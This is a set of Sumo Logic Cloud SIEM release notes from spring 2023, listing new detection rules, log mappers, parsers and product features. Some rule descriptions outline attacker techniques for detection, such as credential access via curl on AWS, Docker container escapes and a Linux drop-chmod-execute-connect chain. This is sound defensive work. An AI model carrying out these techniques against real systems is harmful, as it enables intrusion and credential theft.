  • [Updated] MATCH-S00815 Threat Intel - Successful Authentication from Threat IP

Log Mappers

  • [Updated] AzureActivityLog 01

May 26, 2023 - Content Release

This release changes CrowdStrike mapper record types from 'Endpoint' to 'Audit' to align with CrowdStrike documentation. It also includes fixes to Fortinet severity scoring and SentinelOne IP mappings, additional values for the Windows mappers for Snare, Snare parser updates for Windows Event 4947, updates to the Trend Micro Deep Security CEF parser to allow additional timestamp formats, and a minor rule update.

Rules

  • [Updated] AGGREGATION-S00005 Suspicious System Enumeration Occurring in Quick Succession
    • Rule no longer in prototype

Log Mappers

  • [Updated] CrowdStrike Audit Logs
  • [Updated] CrowdStrike Falcon Host API DetectionSummaryEvent
  • [Updated] CrowdStrike Falcon Host API IdpDetectionSummaryEvent (CNC)
  • [Updated] CrowdStrike Falcon Identity Protection (CNC)
  • [Updated] CrowdStrike Remote Response Session (CNC)
  • [Updated] CrowdStrike UserActivity Logs
  • [Updated] Fortinet DLP Logs
  • [Updated] Fortinet IPS Logs
  • [Updated] SentinelOne Logs - C2C agents
  • [Updated] SentinelOne Logs - C2C threats
  • [Updated] Windows - Security - 4947
  • [Updated] Windows - Security - 4948

Parsers

  • [Updated] /Parsers/System/Trend Micro/Trend Micro Deep Security - CEF
  • [Updated] /Parsers/System/Microsoft/Shared/Windows Text Transforms - Security

May 12, 2023 - Content Release

In the latest content release, the Threat Labs team has added a series of new AWS-specific detections and improved both the mappers and the parser for AWS GuardDuty to include proper inbound/outbound network connection direction and port assignments. Additional context and minor corrections and improvements can be found in the list below.

Rules

  • [New] MATCH-S00874 AWS Lambda Function Recon
  • [New] MATCH-S00875 AWS VPC Flow Log Deletion
  • [New] MATCH-S00876 Potential AWS Security Credential Access via curl
  • [Updated] MATCH-S00226 Azure - Add Member to Group
    • TLAB-542: Update Azure Group Add rule and mapper addition
    • Keys updated: summary_expression, normalized_summary

Log Mappers

  • [Updated] AWS GuardDuty Alerts from Sumo CIP
  • [Updated] AWSGuardDuty_Backdoor
  • [Updated] AWSGuardDuty_Behavior
  • [Updated] AWSGuardDuty_Catch_All
  • [Updated] AWSGuardDuty_CryptoCurrency
  • [Updated] AWSGuardDuty_Discovery
  • [Updated] AWSGuardDuty_Exfiltration
  • [Updated] AWSGuardDuty_PenTest
  • [Updated] AWSGuardDuty_Trojan
  • [Updated] AzureActivityLog AuditLogs
  • [Updated] Recon_EC2_PortProbeUnprotectedPort
  • [Updated] Recon_EC2_Portscan
  • [Updated] Recon_IAMUser
  • [Updated] UnauthorizedAccess_EC2_SSHBruteForce
  • [Updated] UnauthorizedAccess_EC2_TorClient
  • [Updated] UnauthorizedAccess_EC2_TorIPCaller
  • [Updated] UnauthorizedAccess_EC2_TorRelay
  • [Updated] UnauthorizedAccess_IAMUser

Parsers

  • [Updated] /Parsers/System/AWS/AWS S3 Server Access Logs
    • AWS S3 Server Access Logs parser fix related to new fields and wrapper
  • [Updated] /Parsers/System/Cisco/Cisco ASA
    • Modifies ASA header parser to account for additional delimiter variant
  • [Updated] /Parsers/System/AWS/GuardDuty

May 5, 2023 - Content Release

The latest content release includes Office 365 mapping, parsing, and rule changes that better account for fields previously encapsulated within the Parameters field. Additionally, we improved the Zscaler Nanolog mapping and parsing to present port data more accurately, including when it is extracted from URLs.

Rules

  • [Updated] MATCH-S00830 Office 365 Forwarding Rule Created
  • [Updated] MATCH-S00831 Office 365 Unified Audit Logging Disabled

Log Mappers

  • [Updated] Microsoft Office 365 Exchange Mailbox Audit Events: Keys updated: 'targetUser_username'
  • [Updated] Office 365 - Exchange Admin Events: Keys updated: 'user_username', 'targetUser_username'
  • [Updated] Zscaler - Nanolog Streaming Service - JSON: Keys updated: 'dstPort'

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco Firepower Syslog: REGEX modifications to parse the Firepower Event ID
  • [Updated] /Parsers/System/Microsoft/Office 365
  • [Updated] /Parsers/System/Zscaler/Zscaler Nanolog Streaming Service/Zscaler Nanolog Streaming Service-CEF
  • [Updated] /Parsers/System/Zscaler/Zscaler Nanolog Streaming Service/Zscaler Nanolog Streaming Service-JSON
  • [Updated] /Parsers/System/Zscaler/Zscaler Nanolog Streaming Service/Zscaler Nanolog Streaming Service-LEEF

May 3, 2023 - Application Update

Cloud SIEM Insight Trainer

We are excited to announce the release of Cloud SIEM Insight Trainer, a dashboard packaged with the Cloud SIEM Application.

Many security teams spend time every week tuning their SIEM to improve detections and focus SOC analyst attention on the most serious threats. Insight Trainer uses machine learning to provide Rule tuning recommendations and severity adjustments that significantly reduce the burden of manual tuning. It learns Rule severity adjustments from your Insight history in order to reduce False Positive and, optionally, "No Action" Insights.

Cloud SIEM Insight Trainer

Some of the highlights of Insight Trainer include:

  • Customer-Specific Tuning Recommendations - Insight Trainer makes recommendations specific to each customer based on their unique set of Rules, Insight history, and analyst Insight resolutions.
  • Improved SOC Efficiency - Insight Trainer automates the manual process of identifying Rules that are candidates for tuning or severity adjustment and provides impact analysis of the changes.
  • Machine Learning/AI-Driven Analytics - Insight Trainer leverages machine learning and AI to deliver outcome-based recommendations geared towards the reduction of false positive and non-actionable Insights without compromising the actual detection value or true positive Insights in Cloud SIEM.
  • Easy Adoption - The dashboard is available as an update to our already existing Enterprise Audit Cloud SIEM application and can be set up to run with no additional configuration or data science knowledge.

Periodic application of the recommended changes will improve the quality of Insights generated by Cloud SIEM. For more information about the Insight Trainer, see our detailed online documentation.

Bug Fixes

  • On the Insight Related Entities list, some of the Signal counts were incorrect.
  • Whitespace, including new lines, was being stripped from some Enrichments formatted in JSON.
  • Indicators not using the proper case were being accepted but displaying as "NotFlagged" in the UI.

April 28, 2023 - Content Release

Rules

Updates several Azure-based rules to account for modifications made to normalization mappers.

  • [New] MATCH-S00873 AWS EKS Cluster Configuration Updated: AWS EKS clusters contain various configuration options, including for which IP addresses can access the cluster API. Ensure that this change is authorized and expected.
  • [New] MATCH-S00872 AWS EKS Failed Curl Authentication Attempt: Failed instances of curl usage within a containerized environment should occur rarely. Investigate the source IP address used to ensure that it is legitimate.
  • [New] MATCH-S00871 AWS EKS Pod Shared Object Modification or Creation: A Kubernetes pod was either created, updated or patched with a shared process namespace.
  • [New] MATCH-S00870 AWS EKS Secrets Created: Kubernetes secrets may be created for legitimate purposes. Ensure that the secret created is from an IAM account that is expected to manage Kubernetes workloads on EKS.
  • [New] MATCH-S00869 AWS EKS Secrets Deleted: Kubernetes secrets may be deleted for legitimate purposes. Ensure that the secret was deleted by an IAM account that is expected to manage Kubernetes workloads on EKS.
  • [New] FIRST-S00036 First Seen AWS EKS API Call via CloudTrail from User: The user user_username has performed an operation on an EKS cluster for the first time since the baseline period.
  • [New] FIRST-S00037 First Seen AWS EKS Admission Controller Created by IP Address: First Seen Admission Controllers (submit a new MutatingWebhookConfiguration or ValidatingWebhookConfiguration object via the Kubernetes API, or update an existing one.)
  • [New] FIRST-S00035 First Seen AWS EKS Secrets Enumeration from IP Address: srcDevice_ip has enumerated secrets on an AWS EKS cluster for the first time since the baseline period.
  • [New] FIRST-S00034 First Seen Session Token Granted to User from New IP: An AWS Session token was issued for the first time since the baseline period to user_username using the IP address of srcDevice_ip.
  • [New] FIRST-S00033 First Seen Terminal-Attached Pod Deployed to EKS: A pod was deployed with an attached terminal (stdin=true,stdout=true,tty=true) for the first time since the baseline period.
  • [New] THRESHOLD-S00114 HTTP Response Error Spike to AWS EKS: HTTP web services provide response codes to client requests. Response codes in the 400s indicate a client-related error and response codes in the 500s represent server-related errors. This rule looks for an AWS EKS cluster receiving a large number of web errors within a short period of time. It is unusual for a web client to cause this many errors in a short period of time. Common causes of this behavior are scanning/probing activity or scripted web clients that are now encountering errors due to a misconfiguration or recent change. This rule alerts when a host on the monitored network triggers the threshold.
  • [New] MATCH-S00868 New Binding Role Created on AWS EKS: A role binding grants a resource superuser or administrative access to a Kubernetes cluster. Ensure this action is expected and performed by known Kubernetes administrators.
  • [New] MATCH-S00867 New Cluster Admin Binding Role Created on AWS EKS: A cluster-admin role binding grants a resource superuser or administrative access to a Kubernetes cluster. Ensure this action is expected and performed by known Kubernetes administrators.
  • [New] MATCH-S00866 Privileged Pod Created on AWS EKS: Privileged containers have all capabilities of the host machine. These privileged containers may perform actions directly on the host that they are running on. Ensure that this event is expected and occurs from a user account or IP address that normally works with privileged containers within the cluster. Customers are encouraged to set up an exclusion list for spec.securitycontext.capabilities for pods that are frequently going to be managed with privileged escalation.
  • [Updated] MATCH-S00864 Azure Firewall Rule Modified
  • [Updated] MATCH-S00839 Azure Virtual Machine RunCommand Issued
  • [Updated] FIRST-S00021 First Seen Azure Virtual Machine Run Command Issued by User
  • [Updated] FIRST-S00032 First Seen Kubectl Command From User: Expanded record types considered to include Endpoint.
  • [Updated] CHAIN-S00012 Potential Azure Persistence via Automation Accounts
  • [Updated] MATCH-S00167 Recon Using Common Windows Commands: Narrowed rule criteria to Windows executables to prevent erroneous matches from *nix based systems

Log Mappers

  • [New] Administrator Audit Trail: Modified CyberArk EPM mappers to include alternate field values.
  • [New] Administrator Logon
  • [New] Darktrace Parser - Anomalous Connection: Modifies Darktrace mappers to include alternate field values and supports additional events.
  • [New] Darktrace Parser - Brute Force Attempt
  • [New] DocuSign Monitor - Alert
  • [New] DocuSign Monitor - Catch All: Adds support for DocuSign Monitor events via C2C.
  • [New] Druva inSync - Catch All: Adds support for Druva events via C2C.
  • [New] Jamf Audit User - Authentication
  • [New] Jamf Audit User - Endpoint
  • [New] Jamf Audit User - Network
  • [New] Workday - Sign On: Expands mapping support for Workday logs ingested via C2C.
  • [Updated] Azure Administrative logs
  • [Updated] Cisco Meraki IDS Alert - C2C: Corrects typo in mapper for some IP/port fields
  • [Updated] Darktrace Parser - Catch All
  • [Updated] Darktrace Parser - New Device
  • [Updated] Darktrace Parser Events
  • [Updated] Jamf Audit User - Audit
  • [Updated] Sysdig Benchmark JSON: Corrects bug in severity mapping for Sysdig mappers.
  • [Updated] Sysdig Policy Detection JSON: Corrects bug in severity mapping for Sysdig mappers.
  • [Updated] Sysdig Scanning JSON: Corrects bug in severity mapping for Sysdig mappers.
  • [Updated] Workday - Catch All: Expands mapping support for Workday logs ingested via C2C.
  • [Updated] Zscaler - Nanolog Streaming Service - JSON: Corrects NSS record type to NetworkProxy instead of NetworkFlow

Parsers

Adds support for DocuSign Monitor and Druva inSync Cloud, and additional support for Meraki, CyberArk, and Workday events.

  • [New] /Parsers/System/DocuSign/DocuSign Monitor
  • [New] /Parsers/System/Druva/Druva inSync Cloud
  • [Updated] /Parsers/System/Cisco/Cisco Meraki: Strip off extraneous … from URLs
  • [Updated] /Parsers/System/Cyber-Ark/CyberArk EPM JSON: Corrected time parsing
  • [Updated] /Parsers/System/Darktrace/Darktrace JSON
  • [Updated] /Parsers/System/Duo Security/Duo Multi-Factor Authentication: Duo Parser Fix for Setting Event ID Correctly
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CEF: Adds support for Network events ingested via a log forwarder or Cortex Data Lake.
  • [Updated] /Parsers/System/Workday/Workday

April 21, 2023 - Application Update

Automation Service

Sumo Logic is excited to announce a new feature that integrates functionality previously available only in our Cloud SOAR solution directly into Cloud SIEM. This new feature, the Automation Service, allows you to define and automate smart actions, including enrichments and notifications, enabling your security analysts to address potential security threats faster and more accurately.

You can interact with the service through automations, which execute playbooks. Playbooks are composed of one or more actions with a workflow that can include parallel actions and logic steps. Actions are defined as part of integrations.

The Automation Service includes over 350 integrations out of the box, each including several predefined actions:

Automation Service Integrations

Many playbooks are also included, providing instant value with practically no effort - simply connect the integration to the appropriate endpoint and enable the corresponding automation in Cloud SIEM. Playbooks can be automatically triggered when Insights are created or closed, or triggered manually.

Automation Service Playbook Example

You can also customize these objects or create entirely new ones. While the out of the box actions primarily execute directly from the Sumo Logic cloud, custom actions run through a proxy called a Bridge which runs on a system managed by you.

Automations (and other objects) are accessible through the Configuration menu, under Integrations:

Automation Service Menu

Automation results are accessible from Insight and Entity detail pages.

The Insight Enrichment Server and the Actions functionality in Cloud SIEM, which are replaced by the Automation Service, will be deprecated on November 30, 2023. Until then, they will continue to be fully supported and operational. To aid in migration, all current Enrichment Server examples and Actions have equivalent actions and playbooks in the Automation Service. In addition, through the Bridge, customers can execute any existing PowerShell script currently connected to the Insight Enrichment Server.

note

The Automation Service currently has Limited Availability. This means that it is fully functional and supported in production environments, but not automatically deployed to every customer. If you would like it deployed to your environment, please contact Sumo Logic and we will enable it for you.

There is much more information about the Automation Service and how to use it in the online documentation.

Threat Indicators

The way enrichments are displayed in Cloud SIEM is also being enhanced to provide important information to security analysts when they need it, without having to look it up.

First, the Enrichment tabs have been reorganized by Entity (instead of by Enrichment) and additional filter controls have been added:

Enrichments Tab

In addition, Entity enrichments will now persist outside of Insights. So, for example, if an Entity is enriched as part of an Insight, those enrichment details will be visible from that Entity’s details page.

This persistence can be controlled by setting an expiration date as part of the enrichment. In addition, URLs can be attached to enrichments (so that users can click on the link to see more detailed information about the enrichment by, for example, going to the VirusTotal web page for that indicator).

Finally, enrichments can now set reputation indicators. These indicators will be visible anywhere in the UI that the Entity is displayed. Where there is sufficient room, a color-coded text label will be displayed (as in the example above); in other situations, an icon will be displayed instead.

The reputation is not set automatically; the enrichment must pass a reputation to Cloud SIEM. More information about this, and the other new features, is available in online documentation.

Minor Changes and Enhancements

  • [Updated] The Entity Relationship Graph view on Insights has exited open Beta and is now fully supported.
  • [New] When using custom columns with Match Lists, CIDR block matches are now supported with IP address-related fields.
  • [New] When referring to Match Lists, specific columns can now be specified in rule conditions for all Match List types. (Previously this functionality was only available for Threat Intelligence lists.)

April 20, 2023 - Content Release

Summary

Within our latest content release we are introducing a new set of rules related to our 5th Threat Research Campaign structured around Docker, Azure, and Linux. We also made Mapper additions to support Cisco Meraki events ingested via C2C, Cyber Ark Mapper improvements, and new Jamf Audit User Event and Jamf Protect Mappers.

Rules

  • [New] MATCH-S00864 Azure Firewall Rule Modified: The Azure Firewall may provide egress and ingress controls for a variety of Azure services; unexpected or unplanned firewall modifications should be investigated.
  • [New] AGGREGATION-S00006 Docker Enumeration Detected on Host: Threat actors will aim to enumerate various permissions and settings on hosts with Docker installed; this enumeration can potentially lead to exploitation avenues.
  • [New] FIRST-S00031 First Seen IP Address Associated with User for a Successful Azure AD Sign In Event: A user has successfully signed into an Azure resource from an IP address seen for the first time since the baseline period.
  • [New] FIRST-S00032 First Seen Kubectl Command From User: A user has issued a Kubectl command on a hostname for the first time since the baseline period.
  • [New] THRESHOLD-S00112 Multiple Azure Firewall Deny Events for IP: An Azure firewall has denied a large number of requests from an IP address within a short time window.
  • [New] THRESHOLD-S00113 Multiple Azure Firewall Deny Events for URL: An Azure firewall has denied a large number of requests to a URL within a short time window.
  • [New] MATCH-S00865 Potential Docker Escape via Command Line: This rule looks for whether the raw Docker socket was used for container creation together with a bind mount of /hostfs, which could facilitate a container escape and allow command execution on the Docker host.
  • [New] CHAIN-S00014 Potential Docker Container Escape via Cgroups: A Docker container running with the privileged flag may be exploited by threat actors, potentially resulting in an escape from the container to the host it is running on. This can result in various privilege escalation opportunities.
  • [New] CHAIN-S00015 Suspicious Linux Execution Chain: This alert looks for a number of search expressions that together form a suspicious Linux execution chain: a file created in a user's home directory or in /tmp, followed by a chmod and execution of the file, and the process then making a network connection.

Log Mappers

  • [New] Cisco Meraki File Scanned - C2C
  • [New] Cisco Meraki IDS Alert - C2C
  • [New] Cisco Meraki Organization Configuration Change - C2C
  • [New] Cisco Meraki Wireless Air Marshall - C2C
  • [New] Jamf Audit User - Events
  • [New] Jamf Protect Analytics - Events
  • [Updated] Cisco Meraki 8021x
  • [Updated] Cisco Meraki Catch All - Custom Parser
  • [Updated] Cisco Meraki Client Association
  • [Updated] Cisco Meraki Content Filtering Block - Custom Parser
  • [Updated] Cisco Meraki Flow Start_End - Custom Parser
  • [Updated] Cisco Meraki Flows - Custom Parser
  • [Updated] Cisco Meraki IDS - Custom Parser
  • [Updated] Cisco Meraki Security Filtering Disposition Change - Custom Parser
  • [Updated] Cisco Meraki Security Filtering File Scanned - Custom Parser
  • [Updated] Cisco Meraki URLS - Custom Parser
  • [Updated] Cisco Meraki WPA - Custom Parser
  • [Updated] Cyber Ark 01
  • [Updated] Cyber Ark EPM AggregateEvent
  • [Updated] Cyber Ark EPM AuditAdmin
  • [Updated] Cyber Ark EPM GetComputer
  • [Updated] Cyber Ark EPM Policy
  • [Updated] Cyber Ark EPM RawDetails
  • [Updated] Cyber Ark EPM RawEvents
  • [Updated] Cyber Ark Vault JSON
  • [Updated] Jamf Parser - Catch All

Parsers

  • [New] /Parsers/System/Cisco/Cisco Meraki C2C
  • [New] /Parsers/System/Sophos/Sophos Central C2C JSON
  • [Updated] /Parsers/System/Jamf/Jamf

April 13, 2023 - Content Release

Summary

  • Updated GuardDuty mappers to use detail.type instead of overly verbose detail.description.
  • Added parsing and mapping support for Citrix Cloud C2C.
  • Secondary corrections around the Match List fix for column-specific filters.
  • New Sophos C2C mapper expansion around Event and Alert normalization.
  • Net-new OOTB content for Zoom: eight Match rules, six Mappers, one Parser.

Rules

  • [New] MATCH-S00856 Zoom - Account Created
  • [New] MATCH-S00857 Zoom - Account Deleted
  • [New] MATCH-S00858 Zoom - Group Admin Added
  • [New] MATCH-S00859 Zoom - Group Admin Deleted
  • [New] MATCH-S00860 Zoom - Group Changes
  • [New] MATCH-S00861 Zoom - Information Barrier Policy Changes
  • [New] MATCH-S00862 Zoom - Meeting Risk Alert
  • [New] MATCH-S00863 Zoom - Recording Modification
  • [Updated] THRESHOLD-S00096 Brute Force Attempt
  • [Updated] MATCH-S00565 Direct Outbound DNS Traffic
  • [Updated] THRESHOLD-S00103 Domain Brute Force Attempt
  • [Updated] THRESHOLD-S00102 Domain Password Attack
  • [Updated] THRESHOLD-S00095 Password Attack
  • [Updated] CHAIN-S00008 Successful Brute Force

Log Mappers

  • [New] Citrix Cloud Client Created or Deleted
  • [New] Sophos - C2C Alerts
  • [New] Sophos - C2C Event Threat Detections
  • [New] Zoom - Account Creations or Deletions
  • [New] Zoom - Catch All
  • [New] Zoom - Group Modifications
  • [New] Zoom - Information Barrier Policy Modifications
  • [New] Zoom - Meeting Risk Alert
  • [New] Zoom - Recording Deleted or Trashed
  • [Updated] AWSGuardDuty_PenTest
  • [Updated] AWSGuardDuty_Stealth
  • [Updated] Recon_EC2_PortProbeUnprotectedPort
  • [Updated] Recon_IAMUser

Parsers

  • [New] /Parsers/System/Citrix/Citrix Cloud C2C
  • [New] /Parsers/System/Zoom/Zoom

April 13, 2023 - Application Update

Minor Changes and Enhancements

  • [New] When logs fail to parse or map, a detailed error message will be logged in the sec_record_failure index, in the fields.reason attribute.
  • [New] Where possible, private domains are now automatically enriched by Cloud SIEM during record processing.
  • [Updated] Insight comments can now contain up to 1024 characters (up from 256).
  • [New] On the list of Rule Tuning Expressions, each Tuning Expression now lists the number of Rules to which it is currently applied.
  • [New] For First Seen Rules, the UI will display the baseline model status (i.e., building, with amount of progress, or complete). (Note it will only display the status on Rules that were created or updated after this feature became available.)

Bug Fixes

  • In some cases, inventory data from an AWS EC2 source was not being displayed in Cloud SIEM properly.
  • For Yara-based signals with file attachments, users were unable to download the file.
  • Occasionally, some related Entities were not visible in the Insight Related Entities graph but were included correctly on the list.
  • Entity suppression state was being reported incorrectly on several screens.
  • The Manage Entity Groups permission was required to view Entity Groups. Now only View Entity Groups is required.
  • Links to the Cloud SIEM API no longer require a trailing slash.

April 7, 2023 - Content Release

This release includes bug fixes for several rules that use match lists with the "column" field in the rule expression.

Rules

  • [New] FIRST-S00030 First Seen Outbound Connection to External IP Address on Port 445 from IP Address; External connections over the internet to port 445 could be indicative of hash leak attempts, including exploitation attempts for vulnerabilities such as CVE-2023-2397. This alert looks at a source IP address making a connection to a new external destination IP address since the baseline period.
  • [Updated] FIRST-S00029 First Seen Successful Authentication From Unexpected Country; Added additional logic to help reduce false positives
  • [Updated] THRESHOLD-S00096 Brute Force Attempt
  • [Updated] MATCH-S00565 Direct Outbound DNS Traffic
  • [Updated] THRESHOLD-S00103 Domain Brute Force Attempt
  • [Updated] THRESHOLD-S00102 Domain Password Attack
  • [Updated] THRESHOLD-S00095 Password Attack
  • [Updated] CHAIN-S00008 Successful Brute Force

Log Mappers

  • [New] OpenVPN Logon Attempt
  • [New] OpenVPN Network Event
  • [New] Snowflake Catch All
  • [New] Snowflake Login
  • [New] Windows Defender ATP Alert
  • [Updated] Netskope - Audit Authentication Events - Logoff; Made eventID match more permissive

Parsers

  • [New] /Parsers/System/Snowflake/Snowflake
  • [New] /Parsers/System/Microsoft/Windows Defender ATP Alert JSON
  • [Updated] /Parsers/System/Cisco/Cisco ASA; Build/Teardown parsing bug fix
  • [Updated] /Parsers/System/OpenVPN/OpenVPN Syslog; Added support for additional format

March 24, 2023 - Content Release

Overall improvements to OOTB First Seen rules include minor baseline tweaks and severity adjustments for the following rules. For corrections involving logic adjustment, additional context is included within the individual rule. This update also adds Alternative Values for Proofpoint TAP Mappers.

Rules

  • [Updated] FIRST-S00002 First Seen AWS API Call from User; General logic improvement to filter on valid Identity type
  • [Updated] FIRST-S00023 First Seen AWS API Gateway Enumeration by User; General logic improvement to filter on valid application
  • [Updated] FIRST-S00024 First Seen AWS SSM RunShellScript SendCommand From User
  • [Updated] FIRST-S00026 First Seen Anonymous Logon Change Activity to Domain Controller
  • [Updated] FIRST-S00007 First Seen DynamoDB Enumeration from User
  • [Updated] FIRST-S00004 First Seen Local Group Addition by User
  • [Updated] FIRST-S00009 First Seen RDP Logon From User
  • [Updated] FIRST-S00022 First Seen S3 Bucket ACL Enumeration by User
  • [Updated] FIRST-S00025 First Seen SMB Allowed Traffic From IP
  • [Updated] FIRST-S00029 First Seen Successful Authentication From Unexpected Country
  • [Updated] FIRST-S00011 First Seen Sysmon IMPHASH - Global; Reconfigured to be disabled by default
  • [Updated] FIRST-S00012 First Seen Sysmon IMPHASH - Host; Reconfigured to be disabled by default
  • [Updated] FIRST-S00005 First Seen User Creation From User
  • [Updated] FIRST-S00008 First Seen whoami command From User

Log Mappers

  • [Updated] Proofpoint Targeted Attack Protection C2C - Click Blocked
  • [Updated] Proofpoint Targeted Attack Protection C2C - Click Permitted
  • [Updated] Proofpoint Targeted Attack Protection C2C - Message Blocked
  • [Updated] Proofpoint Targeted Attack Protection C2C - Message Delivered
  • [Updated] Proofpoint Targeted Attack Protection C2C - Message Permitted

March 16, 2023 - Application Update

Minor Changes and Enhancements

  • [New] The Entity Timeline can now be filtered by record type:
Entity Timeline Filter

Bug Fixes

  • When an Entity normalization lookup table was deleted and then re-created in the Sumo platform, the configuration in Cloud SIEM was not automatically updated, causing the normalization to fail.
  • Match lists with custom columns were not working properly during record processing.
  • The Network Blocks section was missing from the Entity details panel.
  • Links for schema tags were not displaying in the UI properly.

March 15, 2023 - Content Release

Rules

  • [New] CHAIN-S00013 GCP IDS Detection Followed by API Call; Detects a GCP IDS hit followed by an API call, indicating the source IP was able to gain access to GCP.
  • [Updated] THRESHOLD-S00087 Slack - Possible Session Hijacking; Adjusts "Slack - Possible Session Hijacking" to use 'sessionId' schema field.

Log Mappers

  • [New] GCP IDS; Mapper for GCP IDS events
  • [New] Netskope - Catch All; Added 'Catch All' Mapper to account for unavailability of event identifier in all messages.
  • [New] Slack Login; Added mapping specific to logon success/failure events
  • [Updated] Slack Catch All; Adjusts mapper to use the new sessionId schema field in place of sourceUid

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco Firepower Syslog; Adjusts the Cisco Firepower parser for some FTD events and corrects routing for Snort-like and ASA messages that pass through the Firepower parser.
  • [Updated] /Parsers/System/Google/GCP; Adds additional time format handling

Schema

  • [New] sessionId; An ephemeral and at least semi-unique identifier of a connection between two systems (e.g., HTTP session, user logon session, TCP session identifiers)

March 10, 2023 - Content Release

This release contains a new set of mappers related to AWS CloudTrail Lambda functions, permissions, and event sources, and how changes to them align across our schema. It also corrects the rerouted parser path ('System') for Snort-like formatted messages.

Log Mappers

  • [New] CloudTrail - lambda.amazonaws.com - AddLayerVersionPermission
  • [New] CloudTrail - lambda.amazonaws.com - AddPermission
  • [New] CloudTrail - lambda.amazonaws.com - CreateEventSourceMapping
  • [New] CloudTrail - lambda.amazonaws.com - CreateFunction
  • [New] CloudTrail - lambda.amazonaws.com - CreateFunctionUrlConfig
  • [New] CloudTrail - lambda.amazonaws.com - DeleteEventSourceMapping
  • [New] CloudTrail - lambda.amazonaws.com - DeleteFunction
  • [New] CloudTrail - lambda.amazonaws.com - DeleteFunctionUrlConfig
  • [New] CloudTrail - lambda.amazonaws.com - GetEventSourceMapping
  • [New] CloudTrail - lambda.amazonaws.com - GetFunction
  • [New] CloudTrail - lambda.amazonaws.com - GetFunctionConfiguration
  • [New] CloudTrail - lambda.amazonaws.com - GetFunctionUrlConfig
  • [New] CloudTrail - lambda.amazonaws.com - GetLayerVersionPolicy
  • [New] CloudTrail - lambda.amazonaws.com - GetPolicy
  • [New] CloudTrail - lambda.amazonaws.com - ListEventSourceMappings
  • [New] CloudTrail - lambda.amazonaws.com - ListFunctionUrlConfigs
  • [New] CloudTrail - lambda.amazonaws.com - ListFunctions
  • [New] CloudTrail - lambda.amazonaws.com - PublishLayerVersion
  • [New] CloudTrail - lambda.amazonaws.com - RemovePermission
  • [New] CloudTrail - lambda.amazonaws.com - UpdateEventSourceMapping
  • [New] CloudTrail - lambda.amazonaws.com - UpdateFunctionCode
  • [New] CloudTrail - lambda.amazonaws.com - UpdateFunctionConfiguration
  • [New] CloudTrail - lambda.amazonaws.com - UpdateFunctionUrlConfig

Parsers

  • [Updated] /Parsers/System/Suricata/Suricata Syslog

March 7, 2023 - Application Update

Entity Relationship Graph

We are excited to announce the new Entity Relationship Graph. With this feature, you can now see a graphical visualization of all related Entities in an Insight, as well as additional relationships beyond the Insight. This enables you to more quickly understand relationships among Entities and the larger context behind a potential security threat.

note

This feature is available to all customers but is currently in Beta. If you encounter any issues with this feature, report them to Sumo Logic Support. We appreciate your feedback.

The Entity Relationship Graph (and the Related Entities list) displays all Entities involved in the Insight (those referred to in a record in a Signal in the Insight) as well as additional Entity relationships (for example, if Cloud SIEM detects an IP address may also have had a specific hostname at the time the Insight was generated).

However, unlike the Related Entities list, the graph can visualize additional Entity relationships that existed outside of the Insight during a specified time frame.

Both the list and this new graph are available on the Entities tab of the Insight details page:

The Entity Relationship Graph UI

You can toggle between the list view and the graph view using the control in the upper-right corner of the main panel.

Each node in the graph represents a single Entity. The graph also displays the relationship types and any Indicators. Hovering over an Entity will highlight it and all of its relationships to other Entities, and when an Entity is selected, details about the Entity are displayed on the right.

The graph also includes a number of controls for zoom, full screen mode, filtering by Entity type, and adjusting the time frame for relationship detection.

For more information about how to use the Entity Relationship Graph, see the online documentation. You will also see an introduction to the feature the first time you visit an Insight details page.

Minor Changes and Enhancements

  • [New] First Seen Rules now support the use of non-normalized record fields.
  • [New] When a file is attached to a Signal, it is now available via API (previously it would only be available if part of a Yara Signal or Threat Intel match). The endpoint is /api/v1/extracted-file?filename=
  • [Updated] The default time frame on the Entity Timeline is now 3 days instead of 24 hours.
  • [Updated] The http v2 Insight Action payload now includes a numeric severity value (1-4) in addition to the human-readable severity name (LOW, MEDIUM, HIGH, CRITICAL).
  • [Updated] On the new Active Entities panel on the HUD, if the Entity is a Username, you can now navigate directly to that Entity’s Timeline by hovering over the Entity name and clicking the link.

Bug Fixes

  • In some cases, Cloud SIEM was unable to properly extract the user name from an AWS ARN.
  • A recent change caused checkboxes to malfunction in Firefox.
  • On the Entity Timeline record details, the timestamp wasn’t displaying properly.

March 2, 2023 - Content Release

This release contains changes to how the Palo Alto Firewall CSV parser handles timestamps. Time parsing now relies on _messagetime metadata generated at collection time. This allows individual sources to set timezone information if it is not available in the raw message and as a result, reflect more accurate timestamps for records being created.

Rules

  • [New] MATCH-S00844 LastPass - Account Created
  • [New] MATCH-S00854 LastPass - Failed Login
  • [New] MATCH-S00846 LastPass - Folder Permissions Updated
  • [New] MATCH-S00855 LastPass - Login
  • [New] MATCH-S00847 LastPass - Master Password Changed
  • [New] MATCH-S00848 LastPass - Password Changed
  • [New] MATCH-S00849 LastPass - Personal Share
  • [New] MATCH-S00850 LastPass - Policy Added
  • [New] MATCH-S00851 LastPass - Policy Deleted
  • [New] MATCH-S00852 LastPass - Shared Folder Created
  • [New] MATCH-S00853 LastPass - Super Admin Password Reset

Log Mappers

  • [New] LastPass - Account Created
  • [New] LastPass - Failed Login
  • [New] LastPass - Folder Permissions Updated
  • [New] LastPass - Login
  • [New] LastPass - Master Password Changed
  • [New] LastPass - Password Changed
  • [New] LastPass - Personal Share
  • [New] LastPass - Policy Modifications
  • [New] LastPass - Shared Folder Created
  • [New] LastPass - Super Admin Password Reset
  • [New] LastPass Catch All
  • [New] Sysdig Audit Trail JSON
  • [New] Sysdig Benchmark JSON
  • [New] Sysdig Command JSON
  • [New] Sysdig Connection JSON
  • [New] Sysdig File Access JSON
  • [New] Sysdig Kubernetes JSON
  • [New] Sysdig Policy Detection JSON
  • [New] Sysdig Scanning JSON
  • [Updated] Azure Firewall Network Rule
  • [Updated] Mimecast Email logs

Parsers

  • [New] /Parsers/System/LastPass/LastPass
  • [New] /Parsers/System/Sysdig/Sysdig JSON
  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV
  • [Updated] /Parsers/System/Microsoft/Shared/Windows Forwarding Headers
  • [Updated] /Parsers/System/Microsoft/Shared/Windows Text Transforms - Security
  • [Updated] /Parsers/System/Microsoft/Windows-Syslog Snare

February 24, 2023 - Content Release

